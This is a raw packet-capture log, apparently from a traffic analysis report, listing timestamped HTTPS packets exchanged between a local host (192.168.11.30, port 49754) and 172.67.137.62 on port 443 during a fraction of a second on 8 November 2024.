                                                                                                                          Nov 8, 2024 10:59:44.247349977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.247360945 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.249430895 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.249439955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.249694109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.249702930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.249809027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.251168013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.251178026 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.251317024 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.251326084 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.251419067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.251522064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.252921104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.252931118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.253117085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.253117085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.253290892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.253299952 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.254542112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.254553080 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.254730940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.254740000 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.254807949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.255072117 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.255079985 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.255084991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.255228043 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.255301952 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.256829977 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.256839991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.257009029 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.257067919 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.257268906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.257277966 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.257520914 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.258599997 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.258610010 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.258791924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.258791924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.258904934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.258908987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.259285927 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.260309935 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.260318041 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.260648012 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.260657072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.260906935 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.261038065 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.261236906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.262475014 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.262481928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.262653112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.262676001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.262676001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.262681961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.262808084 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.263063908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.264127970 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.264158010 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.264424086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.264432907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.264537096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.264626980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.266616106 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.266623974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.266848087 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.266856909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.266980886 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.267083883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.268312931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.268321037 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.268476009 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.268497944 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.268502951 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.268774986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.269695997 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.269726038 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.269881010 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.270032883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.270041943 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.270282030 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.271574974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.271583080 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.271739960 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.271775961 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.271821022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.271827936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.271892071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.272030115 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.272242069 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.272581100 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.274656057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.274663925 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.274835110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.274956942 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.274961948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.275207996 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.276169062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.276176929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.276495934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.276504993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.276704073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.277981997 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.277990103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.278280020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.278289080 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.278510094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.279738903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.279747009 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.279931068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.279944897 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.279949903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.280061007 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.280301094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.282023907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.282032013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.282253981 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.282263041 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.282382011 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.282448053 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.283462048 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.283468962 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.283612967 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.283866882 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.283875942 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.284066916 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.284374952 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.284558058 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.284593105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.284593105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.284600019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.332825899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.496999979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.497011900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.497368097 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.497378111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.497472048 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.497837067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.497911930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.498307943 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.499566078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.499576092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.499747038 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.499829054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.499836922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.500036001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.501153946 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.501166105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.501339912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.501348972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.501388073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.501488924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.503109932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.503118992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.503282070 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.503305912 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.503448009 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.505234957 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.505245924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.505440950 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.505450010 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.505505085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.505570889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.506911039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.506921053 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.507076025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.507158995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.507168055 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.507235050 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.508514881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.508526087 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.508850098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.508858919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.508918047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.510324955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.510360003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.510488033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.510499001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.510710001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.511121988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.511383057 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.513140917 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.513149023 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.513423920 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.513797998 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.513807058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.514257908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.515012980 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.515021086 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.515218019 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.515315056 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.515325069 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.515599012 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.516671896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.516680002 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.516925097 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.516933918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.517106056 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.517221928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.518733978 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.518740892 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.518912077 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.518994093 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.519002914 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.519076109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.519263029 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.520519018 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.520526886 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.520771027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.520781040 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.520843983 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.520999908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.522378922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.522387028 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.522574902 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.522669077 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.522677898 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.522864103 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.523945093 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.523952961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.524465084 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.524473906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.524916887 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.526005983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.526014090 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.526190996 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.526241064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.526247025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.526355028 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.526542902 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.527853012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.527861118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.528390884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.528399944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.528934956 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.529635906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.529643059 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.529829025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.529934883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.529943943 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.530174017 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.531368017 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.531375885 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.531585932 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.531691074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.531699896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.531951904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.533539057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.533546925 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.533808947 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.533906937 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.533916950 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.534288883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.535156965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.535164118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.535365105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.535373926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.535442114 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.535559893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.536921024 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.536928892 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.537125111 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.537151098 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.537211895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.537388086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.538743019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.538749933 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.539232016 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.539241076 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.539520025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.540698051 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.540705919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.540847063 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.540908098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.540971994 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.540982008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.541102886 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.582859993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.748044968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.748071909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.748275995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.748276949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.748302937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.748560905 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.749562979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.749583960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.749749899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.749771118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.749783039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.750026941 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.751173973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.751194954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.751421928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.751441956 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.751516104 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.751641035 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.753009081 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.753026009 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.753212929 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.753212929 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.753232956 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.753340006 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.753421068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.755039930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.755057096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.755371094 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.755388021 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.755631924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.756758928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.756776094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.756995916 CET49754443192.168.11.30172.67.137.62
